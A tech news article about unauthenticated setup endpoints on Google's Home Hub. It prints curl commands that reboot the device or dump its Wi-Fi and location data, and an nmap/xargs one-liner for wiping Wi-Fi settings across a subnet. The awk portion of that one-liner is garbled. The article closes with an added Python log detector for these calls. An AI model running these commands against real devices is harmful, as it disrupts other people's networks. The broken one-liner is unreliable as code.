
Google’s Home Hub can be bricked with one line of code

Security advocate Jerry Gamblin has posted a set of instructions — essentially basic lines of XML — that can easily pull important information off the Google Home Hub and, in some cases, quickly brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and means that you can see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its pin) and accepts commands remotely (including a quick reboot via the command line).

The command — which consists of a simple URL call via the command line — is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address:

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot


Other one-liners expose further information, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq

{
  "bssid": "cc:be:59:8c:11:8b",
  "build_version": "136769",
  "cast_build_revision": "1.35.136769",
  "closed_caption": {},
  "connected": true,
  "ethernet_connected": false,
  "has_update": false,
  "hotspot_bssid": "FA:8F:CA:9C:AA:11",
  "ip_address": "192.168.1.1",
  "locale": "en-US",
  "location": {
    "country_code": "US",
    "latitude": 255,
    "longitude": 255
  },
  "mac_address": "11:A1:1A:11:AA:11",
  "name": "Hub Display",
  "noise_level": -94,
  "opencast_pin_code": "1111",
  "opt_in": {
    "crash": true,
    "opencast": true,
    "stats": true
  },
  "public_key": "Removed",
  "release_track": "stable-channel",
  "setup_state": 60,
  "setup_stats": {
    "historically_succeeded": true,
    "num_check_connectivity": 0,
    "num_connect_wifi": 0,
    "num_connected_wifi_not_saved": 0,
    "num_initial_eureka_info": 0,
    "num_obtain_ip": 0
  },
  "signal_level": -60,
  "ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
  "ssid": "SSID",
  "time_format": 2,
  "timezone": "America/Chicago",
  "tos_accepted": true,
  "uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
  "uptime": 25244.52,
  "version": 9,
  "wpa_configured": true,
  "wpa_id": 0,
  "wpa_state": 10
}

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process:

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ print up; gsub (/(' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers, but they’re very alarming. Allowing unauthenticated access to these services is lazy at best, and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical — no Home Hub will ever save my life — but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code, but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.
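Because the setup endpoints above accept requests without authentication, the practical control on a home or office network is to watch for them. The following is an added example, not code from Gamblin or Google: it scans HTTP request logs for calls to the article's three port-8008 setup paths and flags a single source that changes state on several devices, which is the pattern the network-wide one-liner produces. The log layout, the sample lines and the `detect_setup_abuse` name and threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Setup endpoints named in the article; the first set changes device state.
DESTRUCTIVE = {"/setup/reboot", "/setup/forget_wifi"}
RECON = {"/setup/eureka_info"}

# Assumed (hypothetical) sensor log layout: ts src dst:port METHOD path
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>[\d.]+):(?P<port>\d+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<path>\S+)$"
)

# Constructed sample log, not captured traffic.
SAMPLE_LOG = """\
2024-01-01T09:00:01Z 192.168.1.50 192.168.1.20:8008 GET /setup/eureka_info
2024-01-01T09:00:05Z 192.168.1.50 192.168.1.20:8008 POST /setup/forget_wifi
2024-01-01T09:00:05Z 192.168.1.50 192.168.1.21:8008 POST /setup/forget_wifi
2024-01-01T09:00:06Z 192.168.1.50 192.168.1.22:8008 POST /setup/forget_wifi
2024-01-01T09:02:00Z 192.168.1.77 192.168.1.20:8008 POST /setup/reboot
2024-01-01T09:03:00Z 192.168.1.77 192.168.1.20:8009 GET /index.html
this line is malformed and must be skipped
"""

def detect_setup_abuse(lines, sweep_threshold=3):
    """Return {src: {"recon": n, "destructive": [(dst, path)], "sweep": bool}}."""
    hits = defaultdict(lambda: {"recon": 0, "destructive": [], "sweep": False})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["port"] != "8008":
            continue  # unparseable line, or not the setup API port
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path in RECON and m["method"] == "GET":
            hits[m["src"]]["recon"] += 1
        elif path in DESTRUCTIVE and m["method"] == "POST":
            hits[m["src"]]["destructive"].append((m["dst"], path))
    for rec in hits.values():
        # One source changing state on many devices matches the subnet sweep.
        targets = {dst for dst, _ in rec["destructive"]}
        rec["sweep"] = len(targets) >= sweep_threshold
    return dict(hits)

if __name__ == "__main__":
    for src, rec in detect_setup_abuse(SAMPLE_LOG.splitlines()).items():
        print(src, rec)
```
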


